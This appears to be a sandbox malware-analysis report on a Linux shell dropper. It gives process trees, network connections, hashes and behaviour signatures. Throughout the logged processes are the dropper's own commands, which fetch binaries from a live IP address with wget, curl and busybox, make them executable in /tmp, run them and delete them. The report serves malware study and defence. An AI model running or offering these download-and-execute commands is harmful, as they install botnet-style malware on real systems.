[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

30s

Max time network

131s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

